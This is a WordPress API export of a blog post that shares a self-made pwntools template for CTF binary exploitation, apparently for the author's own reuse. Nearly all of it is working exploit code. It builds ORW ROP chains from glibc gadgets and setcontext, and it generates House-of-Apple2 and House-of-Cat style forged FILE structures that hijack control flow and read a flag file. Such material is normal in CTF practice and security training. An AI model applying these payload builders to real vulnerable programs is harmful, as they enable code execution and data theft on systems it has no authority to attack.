{"id":308,"date":"2024-09-06T23:35:14","date_gmt":"2024-09-06T15:35:14","guid":{"rendered":"http:\/\/39.104.51.85\/?p=308"},"modified":"2024-10-09T02:57:10","modified_gmt":"2024-10-08T18:57:10","slug":"pwnplus","status":"publish","type":"post","link":"http:\/\/39.104.51.85\/index.php\/2024\/09\/06\/pwnplus\/","title":{"rendered":"pwnplus"},"content":{"rendered":"\n<p>\u81ea\u5df1\u7f16\u7684pwn\u7684\u677f\u5b50<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport abc\nimport logging\nimport os\nimport re\nimport six\nimport string\nimport subprocess\nimport sys\nimport threading\nimport time\n\nfrom six.moves import range\n\nfrom pwnlib import atexit\nfrom pwnlib import term\nfrom pwnlib.context import context\nfrom pwnlib.log import Logger\nfrom pwnlib.timeout import Timeout\nfrom pwnlib.tubes.buffer import Buffer\nfrom pwnlib.util import misc\nfrom pwnlib.util import packing\nfrom pwnlib import qemu\nfrom pwnlib.context import context\nfrom pwnlib.log import getLogger\nfrom pwnlib.timeout import Timeout\nfrom pwnlib.tubes.tube import tube\nfrom pwnlib.util.misc import parse_ldd_output\nfrom pwnlib.util.misc import which\nfrom pwnlib.util.misc import normalize_argv_env\nfrom pwnlib.util.packing import _need_bytes\nfrom pwn import *\nfrom pwncli import *\nclass mypwn():\n    procedurename=None\n    host=None\n    port=None\n    procedure=None\n    def __init__(self, procedurename):\n        self.procedurename=str(procedurename)\n        if ':' in self.procedurename:#\u5982\u679c\u662f\u8fdc\u7aef\n            self.host,self.port=self.procedurename.split(':')\n            self.procedure=remote(self.host,int(self.port))\n        else:\n            self.procedure=process(self.procedurename)\n    def debug(self):\n        attach(self.procedure)\n        pause()\n    def sd(self,payload):\n        self.procedure.send(payload)\n    def 
sda(self,delim,payload,timeout=0):\n        if timeout == 0:\n            self.procedure.sendafter(delim,payload)\n        else:\n            self.procedure.sendafter(delim,payload,timeout=timeout)\n    def sl(self,payload):\n        self.procedure.sendline(payload)\n    def sla(self,delim,payload,timeout=0):\n        if timeout == 0:\n            self.procedure.sendlineafter(delim,payload)\n        else:\n            self.procedure.sendlineafter(delim,payload,timeout=timeout)\n    def ia(self):\n        self.procedure.interactive()\n    def rcv(self,num):\n        self.procedure.recv(num)\n    def rcvu(self,delim,timeout=0):\n        if timeout == 0:\n            self.procedure.recvuntil(delim)\n        else:\n            self.procedure.recvuntil(delim,timeout=timeout)\n    def rnu(self,delim,size,timeout=0):\n        if timeout == 0:\n            self.procedure.recvuntil(delim)\n            self.procedure.recv(size)\n        else:\n            self.procedure.recvuntil(delim,timeout=timeout)\n            self.procedure.recv(size)\n    def uu64(self):\n        return u64(self.procedure.recv(6).ljust(8,b'\\x00'))\n\n    def gift(self, delim):\n        self.procedure.recvuntil(delim)\n        content = self.procedure.recv(14)\n        return int(content, 16)\n    '''\n        \u53c2\u6570\u8bf4\u660e\uff1a\n        libcversion\uff1a\u663e\u5f0f\u6307\u51falibc\u7248\u672c\uff0c\u59822.35,2.23\u7b49\n        libcelf\uff1a\u4f20\u5165\u4e00\u4e2alibc\u7684elf\u6587\u4ef6\n        libcbase\uff1a\u4f20\u5165libc\u57fa\u5740\n        flagaddr\uff1aflag\u5b57\u7b26\u4e32\u5730\u5740\n        payloadposition\uff1a\u8fd9\u6bb5payload\u4f60\u653e\u5728\u54ea\u91cc\u4e86\uff0c2.29\u4ee5\u4e0b\u5c31\u662frdi\u6307\u5411\u7684\u4f4d\u7f6e\uff0c2.29\u4ee5\u4e0a\u5c31\u662frdx\u6307\u5411\u7684\u4f4d\u7f6e\n        \u4f8b\uff1aorw(2.35,libc,libcbase,flagaddr,target_addr)\n        '''\n\n    def orw(self, libcversion, libcelf, libcbase, flagaddr, payloadposition):  # 
libcversion\u7528\u4e8e\u5224\u65ad\u662f2.29\u4ee5\u4e0a\u8fd8\u662f\u4ee5\u4e0b\uff0clibcelf\u4f20\u5165\u7684\u662f\u4e00\u4e2aELF\u6587\u4ef6\n        libcversion = str(libcversion)\n        libcversion = int(libcversion.split('.')&#91;1], 10)\n        rop = ROP(libcelf)\n        rsp = payloadposition + 8\n\n        if libcversion >= 29:\n            pop_r12 = rop.find_gadget(&#91;'pop r12', 'ret']).address + libcbase\n            pop_rsi = rop.find_gadget(&#91;'pop rsi', 'ret']).address + libcbase\n            pop_rdi = rop.find_gadget(&#91;'pop rdi', 'ret']).address + libcbase\n            pop_rax = rop.find_gadget(&#91;'pop rax', 'ret']).address + libcbase\n            pop_r12_r13 = rop.find_gadget(&#91;'pop r12', 'pop r13', 'ret']).address + libcbase\n            pop_rax_rdx_rbx = rop.find_gadget(&#91;'pop rax', 'pop rdx', 'pop rbx', 'ret']).address + libcbase\n            syscall = rop.find_gadget(&#91;'syscall', 'ret']).address + libcbase\n            setcontextaddr = libcelf.symbols&#91;'setcontext'] + 61 + libcbase\n            payload = p64(0) + p64(2)\n            payload += p64(syscall) + p64(pop_r12)\n            payload += p64(setcontextaddr) + p64(pop_rsi)\n            payload += p64(flagaddr) + p64(pop_rdi)\n            payload += p64(3) + p64(pop_rax)\n            payload += p64(0) + p64(syscall)\n            payload += p64(pop_r12_r13) + p64(flagaddr)\n            payload += p64(4) + p64(pop_rax_rdx_rbx)\n            payload += p64(1) + p64(300)\n            payload += p64(0) + p64(pop_r12)\n            payload += p64(rsp) + p64(pop_rax)\n            payload += p64(1) + p64(pop_rdi)\n            payload += p64(1) + p64(syscall)\n        else:\n            pop_rax = rop.find_gadget(&#91;'pop rax', 'ret']).address + libcbase\n            syscall = rop.find_gadget(&#91;'syscall', 'ret']).address + libcbase\n            pop_rdi = rop.find_gadget(&#91;'pop rdi', 'ret']).address + libcbase\n            pop_rdx_rsi = rop.find_gadget(&#91;'pop rdx', 
'pop rsi', 'ret']).address + libcbase\n            pop_r13_r14_r15 = rop.find_gadget(&#91;'pop r13', 'pop r14', 'pop r15', 'ret']).address + libcbase\n            payload = p64(pop_rax) + p64(2)  # open\n            payload += p64(syscall) + p64(pop_rdx_rsi)\n            payload += p64(300) + p64(flagaddr)\n            payload += p64(pop_rdi) + p64(3)\n            payload += p64(pop_rax) + p64(0)  # read\n            payload += p64(syscall) + p64(pop_r13_r14_r15)\n            payload += p64(0) + p64(flagaddr)\n            payload += p64(4) + p64(pop_rdi)\n            payload += p64(1) + p64(pop_rax)  # write\n            payload += p64(1) + p64(syscall)\n            payload += p64(rsp) + p64(pop_rax)\n        return payload\n\n    '''\n    target_addr\u6307\u5411rdx\u7684\u4f4d\u7f6e\uff0c\u5373orwpayload\u6240\u5728\u7684\u4f4d\u7f6e\n    payloadposition\u6307\u5411\u6574\u4e2aapple2 payload\u7684\u6240\u5728\u4f4d\u7f6e\uff0c\u5373rdi(f2)\u7684\u4f4d\u7f6e\uff0c\u6574\u4e2apayload\u662f\u4ecerdi\u6307\u5411\u4f4d\u7f6e\u5f00\u59cb\u7b97\u7684\uff08\u4e0d\u662f\u5806\u5757\u53ef\u5199\u4f4d\u7f6e\uff09,\u5982\u679c\u6709f1\u7684\u8bdd\uff0c\u90a3\u4e48\u5b83\u5c31\u662ff1.chain\n    magic_gadget\u4f20\u5165mov rdx,&#91;rdi+8];...;call &#91;rdx+0x20]\u7684\u5730\u5740\n    '''\n\n    def apple2(self, payloadposition, libcbase, libcelf, magic_gadget):\n        data = ''\n        f2 = IO_FILE_plus_struct()\n        f2._IO_read_ptr = payloadposition+0x270\n        f2._IO_write_ptr = 1\n        f2._flags2 = 8\n        # f2._lock = _lock\n        f2._mode = 0\n        f2._wide_data = payloadposition + 0x100\n        f2.vtable = libcelf.symbols&#91;'_IO_wfile_jumps'] + libcbase\n        data = flat({\n            0x0: bytes(f2),#payloadposition\n            0x100: {\n                0: &#91;0, 0, 0, 0, 0, 0, 0],\n                0xe0: payloadposition + 0x200,\n            },\n            0x240:b'flag\\0',\n            0x248:&#91;0,0,0],\n            0x268: 
magic_gadget,\n            0x270: self.orw(2.35,libcelf,libcbase,payloadposition+0x240,payloadposition+0x270)\n        })\n        return data\n\n\n    def cat(self,payloadposition, libcbase, libcelf):\n        f2 = IO_FILE_plus_struct()\n        f2._IO_read_ptr = payloadposition + 0x200\n        f2._IO_write_ptr = 1\n        f2._mode = 1\n        f2._lock = payloadposition\n        f2._wide_data = payloadposition + 0xd0\n        f2.vtable = libcelf.symbols&#91;'_IO_wfile_jumps'] + libcbase + 0x10\n        flagaddr = payloadposition + 0x120\n        data = flat({\n            0x0: bytes(f2)&#91;16:],  # payloadposition\n            0xd0: &#91;0, 0],\n            0xe0: payloadposition + 0x200,\n            0xf0: {\n                0: &#91;0, 0, 0, 0],\n                0x20: b'flag\\0',\n                0xb0: payloadposition + 0x208,\n            },\n            0x1f0: self.orw(2.35,libcelf,libcbase,flagaddr,payloadposition+0x200),\n        })\n        return data\n\n\n\ndef iofile(flags=0,read_ptr=0,read_end=0,read_base=0,\n                    write_base=0,write_ptr=0,write_end=0,\n                    buf_base=0,buf_end=0,\n                    save_base=0,backup_base=0,save_end=0,\n                    markers=0,chain=0,fileno=0,flag2=0,lock=0):\n    f = p64(flags) + p64(read_ptr) + \\\n        p64(read_end) + p64(read_base) + \\\n        p64(write_base) + p64(write_ptr) + \\\n        p64(write_end) + p64(buf_base) + \\\n        p64(buf_end) + p64(save_base) + \\\n        p64(backup_base) + p64(save_end) + \\\n        p64(markers) + p64(chain) + \\\n        p64(fileno) + p64(flag2) + \\\n        p64(0) + p64(lock)\n    f = f.ljust(0xd0,b'\\x00')\n    return f\n\nif __name__ == '__main__':\n    p=mypwn('.\/srop')\n    # sh=process('srop')\n    p.debug()\n    # p.ia()\n    # 
sh.sendlineafter()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u81ea\u5df1\u7f16\u7684pwn\u7684\u677f\u5b50<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12],"tags":[],"class_list":["post-308","post","type-post","status-publish","format-standard","hentry","category-pwn"],"_links":{"self":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/comments?post=308"}],"version-history":[{"count":2,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/308\/revisions"}],"predecessor-version":[{"id":324,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/posts\/308\/revisions\/324"}],"wp:attachment":[{"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/media?parent=308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/categories?post=308"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/39.104.51.85\/index.php\/wp-json\/wp\/v2\/tags?post=308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}